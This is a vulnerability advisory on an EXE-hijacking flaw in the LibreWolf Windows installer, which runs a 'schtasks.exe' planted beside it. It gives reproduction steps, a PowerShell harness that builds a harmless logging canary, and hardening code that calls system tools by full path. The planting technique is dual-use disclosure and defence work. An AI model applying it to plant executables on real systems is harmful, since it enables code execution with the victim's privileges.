LibreWolf Installer Uncontrolled Search Path Vulnerability Allowing EXE Hijacking

Vulnerability

A vulnerability has been identified in the LibreWolf installer for Windows in versions prior to 144.0-1. The installer invokes the Windows utility 'schtasks.exe' by bare name rather than by its fully qualified path under %SystemRoot%\System32. Windows resolves a bare executable name through a search order that begins with the directory the calling application was loaded from, so the installer looks for 'schtasks.exe' in its own directory, where no such file normally exists, before it looks in the system directory. If an executable with that name is placed in the folder the installer is run from (for example, the user's download directory) before installation starts, the LibreWolf installer runs it once the installation is complete. This allows arbitrary commands to be executed with the same privileges as the user who ran the installer, potentially compromising data or altering system functionality.

Impact

Exploitation of this vulnerability allows an attacker who can write a file into the installer's directory to execute an arbitrary EXE with the same rights as the user who ran the LibreWolf installer. If the installer is run elevated, as Windows installers commonly are, the planted executable inherits that elevation. The result can be unauthorized command execution, data compromise, or changes to system configuration, undermining the security and integrity of the affected environment.

Reproduction

To reproduce this vulnerability, first uninstall any existing LibreWolf installation. Download an affected installer, for example LibreWolf 143.0.4-1 for Windows. Before running it, build a test executable (a harmless one that only records that it ran is sufficient), name it 'schtasks.exe', and place it in the same folder as the installer. Then run the LibreWolf installer. When the installation finishes, the installer launches the planted 'schtasks.exe' instead of %SystemRoot%\System32\schtasks.exe, which confirms the vulnerability.
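The mechanism and the reproduction steps above, as an added example harness that is not part of the advisory or of the LibreWolf project. It assumes a disposable Windows VM, Windows PowerShell 5.1 (for Add-Type with -OutputType ConsoleApplication), and an installer path of C:\Repro\LibreWolf-143.0.4-1.exe, which is a placeholder to adjust. The canary is deliberately harmless: it only appends its own location and arguments to a log file in %TEMP% and exits 0.

```powershell
# Added example (not from the advisory or the LibreWolf project): a benign
# canary harness for the EXE hijack. Run from Windows PowerShell 5.1 on a
# disposable VM, from the directory that contains the installer.

$InstallerPath = 'C:\Repro\LibreWolf-143.0.4-1.exe'   # assumption: your download path
$Marker        = Join-Path $env:TEMP 'schtasks-canary.log'
$CanaryDir     = Split-Path -Parent $InstallerPath
$CanaryExe     = Join-Path $CanaryDir 'schtasks.exe'

# 1. Build a harmless stand-in for schtasks.exe. It records that it ran, where it
#    ran from, and the arguments it received, then reports success so the
#    installer does not notice anything unusual. $Marker is expanded by PowerShell
#    into the C# source before compilation.
$CanarySource = @"
using System;
using System.Diagnostics;
using System.IO;
class Canary {
    static int Main(string[] args) {
        string self = Process.GetCurrentProcess().MainModule.FileName;
        File.AppendAllText(@"$Marker",
            DateTime.UtcNow.ToString("o") + " ran=" + self +
            " args=" + string.Join(" ", args) + Environment.NewLine);
        return 0;
    }
}
"@
Add-Type -TypeDefinition $CanarySource -OutputAssembly $CanaryExe -OutputType ConsoleApplication

# 2. Run the unpatched installer with the canary sitting beside it and wait for
#    it to finish; the advisory states the hijacked call happens post-install.
Remove-Item $Marker -ErrorAction SilentlyContinue
$proc = Start-Process -FilePath $InstallerPath -Wait -PassThru
"installer exit code: $($proc.ExitCode)"

# 3. If the installer resolved 'schtasks.exe' through the search path, the file
#    beside it ran instead of %SystemRoot%\System32\schtasks.exe.
if (Test-Path $Marker) {
    Write-Warning "Planted schtasks.exe was executed by the installer:"
    Get-Content $Marker
} else {
    "Canary was not executed (patched installer, or schtasks.exe called by full path)."
}

# 4. Remove the canary so nothing else started from this directory can pick it up.
Remove-Item $CanaryExe, $Marker -ErrorAction SilentlyContinue
```

The log line written by the canary is the evidence worth keeping: the `ran=` path proves the binary that executed lives in the installer's directory, and `args=` shows what the installer intended to pass to the real schtasks.exe.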

Remediation

Users are advised to upgrade to LibreWolf version 144.0-1 or later, which addresses this vulnerability. The updated version can be downloaded from the LibreWolf GitHub releases page. Until an affected installer is replaced, run it only from a directory whose contents you control and that contains no stray 'schtasks.exe'.
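The general hardening for this class of bug, as an added example that is not LibreWolf's own patch: an installer or script that needs a Windows system tool should build the absolute path under %SystemRoot%\System32 and verify the binary before running it, instead of leaving resolution to the CreateProcess search order. The function name Invoke-SystemTool and the /Query arguments are illustrative choices, not taken from the advisory.

```powershell
# Added example (not the LibreWolf fix): invoke a Windows system tool by full
# path with a signature check, rather than by bare name.
function Invoke-SystemTool {
    param(
        [Parameter(Mandatory)][string]$Name,          # e.g. 'schtasks.exe'
        [string[]]$ArgumentList = @()
    )
    # Fully qualified path under System32: never a bare name, never relative.
    $exe = Join-Path (Join-Path $env:SystemRoot 'System32') $Name
    if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) {
        throw "Expected system tool not found: $exe"
    }
    # Defence in depth: system binaries are Microsoft-signed (usually via
    # catalog, which PowerShell 5.1+ validates); refuse anything else.
    $sig = Get-AuthenticodeSignature -LiteralPath $exe
    if ($sig.Status -ne 'Valid') {
        throw "Refusing to run $exe (signature status: $($sig.Status))"
    }
    & $exe @ArgumentList
    if ($LASTEXITCODE -ne 0) { throw "$Name exited with code $LASTEXITCODE" }
}

# Vulnerable pattern for contrast: a bare name handed to CreateProcess (this is
# what a native installer does) is searched for in the calling application's
# own directory before System32, which is exactly the hijack above.
#   $psi = New-Object System.Diagnostics.ProcessStartInfo 'schtasks.exe'
#   $psi.UseShellExecute = $false
#   [System.Diagnostics.Process]::Start($psi)

# Hardened call: lists scheduled tasks via the real schtasks.exe.
Invoke-SystemTool -Name 'schtasks.exe' -ArgumentList '/Query', '/FO', 'LIST'
```

Note that the signature check alone would not help if the path were still resolved through the search path, since an attacker-controlled file could be signed too; the fully qualified path is the actual fix, and the signature check only guards against a tampered system directory.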

Added: Oct 19, 2025, 9:17 AM
Updated: Oct 19, 2025, 9:17 AM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 10.0
exploitability: 5.8
remediation: 7.7
relevance: 0.8
threat: 6.4
urgency: 2.9
incentive: 0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.